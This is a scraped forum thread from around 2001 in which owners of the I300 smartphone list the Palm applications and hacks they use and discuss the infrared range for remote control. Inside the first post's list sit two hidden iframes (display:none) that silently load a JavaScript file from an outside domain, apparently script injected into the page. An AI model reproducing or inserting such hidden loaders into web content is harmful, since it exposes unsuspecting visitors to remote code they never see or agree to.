+ Reply to Thread
Page 1 of 2 1 2 LastLast

Question What do you have on your I300?

OK everyone.... I like to extend the capabilities of the I300 as much as possible and add useful and interesting applications to my phone. Some of these are games, some are applications, but all of them I found are interesting and/or helpful in my everyday life. So found some interesting ones.. as i'm sure many of you have. I figured this may be a great way to share ideas and utilize the great resource of all of us playing with our new toys.

So... with that being said, what additional applications have you added to your I300?

I'll start:

On The Phone
    Blazer 2.0 Beta
    Eudora e-mail and EudoraWeb
    MobileDB
    PacMan
    TealMovie

On the Desktop
    Palm Desktop 4.0.1

Things I am looking for...
    IR Remote Control for TV/VCR
    Fax Software
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by russdog; 10-25-2001 at 09:48 PM.

Administrator

Arrow

omniremote worked for the 6035, so it should work for the 300..

FAX is a software that is pretty reliable...on the 6035... the app is not compatible with the 300 yet, although he is working on it as we speak...

pac man sounds cool!

Thumbs up My Apps

I have had these apps on my I300 for some time now with no problems.

Blazer 2.0 beta
    BugMe v. 3.7
    Documents2Go v. 4.001 (283)
    GolfTrack Pro v. 4.0
    MobileDB v. 2.1
    MultiMail Pro
    Noah lite (dictionary)
    OmniRemote v. 1.17
    PowerOne Finance v. 2.0
    SplashPhoto v. 2.82
    FreeCell v. 1.0
    TedTruss v. 1.2

lots and lots

I'm almost out of memory. Lots of games and travel programs. Musts: Vindigo (I love that program), Teal Glance/Script, Album to Go and pictures.

Administrator

Arrow

mas..

ditch albums to go and get Fireviewer!! tons better!!!!!!!!!!!! you can do sooo much (moving video.. rotate the pic with the otuch of a stylus, etc..)...

can anybody run hack extensions without the phone freezing up on you?

i tried using tealmaster, with fonthack123 and tealecho, but the phone freezes up when a call is ended. i don't wanna go back to the regular fonts...please help!

hacks

I've had no problem running TealGlance, TealScript and a few other hacks (InvertHack, SilenceHack and ScreenShot). My recommendation is to make sure you have the latest version of everything -- a lot of Hacks conflicted with Palm/Phone combos but have since been updated. (I had this problem with TealGlance, but the newest version worked fine).

where did you get blazer 2.0 beta?

Administrator

Arrow

ro,

go to the sprint website and get it! its free to us sprint folks...

Does anyone have a "full" version of Omniremote? Thank you in advance if you do

comstockery@hotmail.com

Anyone try this app on their I300?

I don't know that I used that one, but I've tried the remote software before and it works great. I just find the buttons on my remote to be a little easier to find than the smooth screen of the I300. I've got the Home Producer which also takes out my garbage and cooks for me!:p

i300 User
    When I had my Palm M505, I used this software - not so much at home, but at some local bars I frequent. Nothing better than having a beer at your favorite watering hole AND having control of the TV I also used it as a spare key on my car as the software can learn and I have IR door locks on my car.

The prob w/ the I300 is that the IR range is only about 3 feet max - compared to 25 feet of the Palm M505. So unless you are within arm's reach of the device you are trying to control (kinda defeats the 'remote' idea ), it is pretty worthless software for the I300 IMO.

gf

Not so Glen. My sofa is about 15 feet from my televison and I had no problems controlling it or any of my other equipment.

My range was about 6 feet.

I think you'll find that range is a bit harder to judge, because past a couple feet, aim becomes very important. I'm not used to having to aim a remote carefully, but I need to do it with my i300 to control my stereo from my couch. (Although after experimenting , I decided I just preferred using the remotes.)

-vave

...anyone start their car with their I300 yet?

i300 User
    I have a remote extender that blinks when it receives an IR signal and I couldn't get it to blink more than 3 feet away. Since you guys are getting much better range, I either a) am not aiming accurately enough or b) I have a lazy I300 that won't work like yours.

Start the car? Not yet, MJ, - but I am waiting for my Swiss Army I300 w/ built in knife, scissors, nail file, tweezers, and bottle opener. Surely they could incorporate these items into the casing?

gf

IR to open the car door? Sounds like a Mercedes..... I'm kind of suprised that its so easy to copy the code..... so any valet could have a palm pilot and be learning car codes all day long?

Brooks

I remember a couple years back there was a huge fuss about this with palms. People were complaining that someone with a palm could easily intercept these IR codes. Haven't heard too much about it lately though.